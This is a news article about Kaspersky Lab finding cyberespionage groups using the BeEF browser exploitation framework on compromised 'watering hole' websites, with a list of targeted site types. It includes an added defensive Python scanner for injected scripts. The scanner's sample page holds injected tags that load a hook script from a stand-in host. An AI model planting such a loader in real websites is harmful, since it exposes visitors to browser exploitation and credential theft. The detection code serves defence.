Attackers use open source security tools for targeted cyberespionage

Kaspersky Lab researchers have uncovered a new trend among cyberespionage threat actors: instead of developing customized hacking tools or buying them from third-party suppliers on the criminal underground, they are using tools available on the web for research purposes. Several cyberespionage campaigns utilizing such tools have been spotted recently by experts.


This means that even less-professional, less-skilled and less-resourced hacker groups can now pose a threat to users and companies. Moreover, the use of legitimate tools for pen-testing makes such attacks less visible to security solutions.

The browser exploitation framework, or BeEF, is one such tool. Originally developed by the security community to make the security testing of browsers better and easier, it is now used by several cyberespionage groups to attack targets around the world.

To exploit vulnerabilities in targets’ browsers, the hackers compromise websites of interest, plant BeEF on them, and then simply wait for potential victims to visit. The BeEF content enables precise identification of both the system and the user, and allows for exploitation and theft of authentication credentials, which in turn enables additional malware to be downloaded to the compromised device, and more. This infection tactic is called setting up a watering hole and is often used by cyberespionage actors.
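The watering-hole tactic described above depends on a script injected into a compromised site, so a site operator can catch it by checking the HTML actually served against an allowlist of script origins. The following Python is an added example written for this page, not code from the article, from Kaspersky Lab, or from the BeEF project; the site name, the allowlist and the sample page are constructed, and the check keys on unexpected script hosts rather than on any particular file name.

```python
"""Flag script loads from non-allowlisted hosts in HTML served by a site you operate.

Added example for this article; the allowlist and sample page below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts this hypothetical site is expected to load scripts from.
ALLOWED_SCRIPT_ORIGINS = {"example-site.test", "cdn.example-site.test"}

# Quoted absolute or protocol-relative URL inside an inline script; group(1) is host[:port].
_INLINE_URL = re.compile(r'["\'](?:https?:)?//([^/"\'\s]+)[^"\'\s]*["\']')


class _ScriptCollector(HTMLParser):
    """Collect <script src=...> references and inline <script> bodies with their line numbers."""

    def __init__(self):
        super().__init__()
        self.external = []      # (src attribute, line number)
        self.inline = []        # (script body, line number)
        self._in_script = False
        self._buf = []
        self._line = 0

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append((src, self.getpos()[0]))
        else:
            self._in_script = True
            self._buf = []
            self._line = self.getpos()[0]

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA, so the body arrives here verbatim.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append(("".join(self._buf), self._line))


def _host_of(url):
    """Host part of an absolute or protocol-relative URL; '' for same-origin relative paths."""
    return urlparse(url).netloc.rsplit("@", 1)[-1].split(":")[0].lower()


def find_unexpected_scripts(html, allowed=ALLOWED_SCRIPT_ORIGINS):
    """Return (kind, host, line) findings for script loads from hosts outside the allowlist."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, line in parser.external:
        host = _host_of(src)
        if host and host not in allowed:
            findings.append(("external-src", host, line))
    for body, line in parser.inline:
        # Dynamic loaders (createElement('script') + .src = ...) reference the host as a string.
        for match in _INLINE_URL.finditer(body):
            host = match.group(1).split(":")[0].lower()
            if host not in allowed:
                findings.append(("inline-loader", host, line))
    return findings


# Constructed sample: two legitimate script loads plus one injected tag and one injected loader.
SAMPLE_PAGE = """<!doctype html>
<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-site.test/lib.js"></script>
<script src="http://injected-host.test:3000/hook.js"></script>
</head><body>
<script>
  var s = document.createElement('script');
  s.src = '//injected-host.test:3000/hook.js';
  document.body.appendChild(s);
</script>
</body></html>"""


if __name__ == "__main__":
    for kind, host, line in find_unexpected_scripts(SAMPLE_PAGE):
        print(f"{kind}: script from non-allowlisted host {host!r} at line {line}")
```

Run it against a copy of each page as fetched from the live site (not from the source repository), since the injection lives in what is served. Relative `src` paths are treated as same-origin and skipped; inline scripts that legitimately mention third-party URLs in string literals will also be reported, so the allowlist should cover every origin the site intentionally loads from.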

“Cybercriminals are going to continue looking for ways to use what already exists for their criminal gain, especially if it takes little time and effort, and that includes open source and legitimate tools. The creativity of repurposing tools and exploits will undoubtedly continue and likely increase in the future,” Kurt Baumgartner, Principal Security Researcher, Kaspersky Lab, told Help Net Security.

During their research, the Kaspersky Lab specialists were able to identify tens of such “watering hole” websites. The nature and topics of these websites reveal a lot about the types of potential targets:

  • Middle-eastern embassy in the Russian Federation
  • Indian military technology school
  • Regional presidency office
  • Ukrainian ICS Scanner mirror
  • European Union education diversification support agency
  • Russian foreign trade management organization
  • Progressive Kazakh news and political media
  • Turkish news organization
  • Specialized German music school
  • Japanese textile manufacturing inspection organization
  • Middle Eastern social responsibility and philanthropy
  • Popular British “lifestyle” blog
  • Algerian University’s online course platform
  • Chinese construction group
  • Russian overseas business development and holding company
  • Russian gaming developer forum
  • Romanian Steam gaming developer
  • Chinese online gaming virtual gold seller
  • Brazilian music instrument retailer.
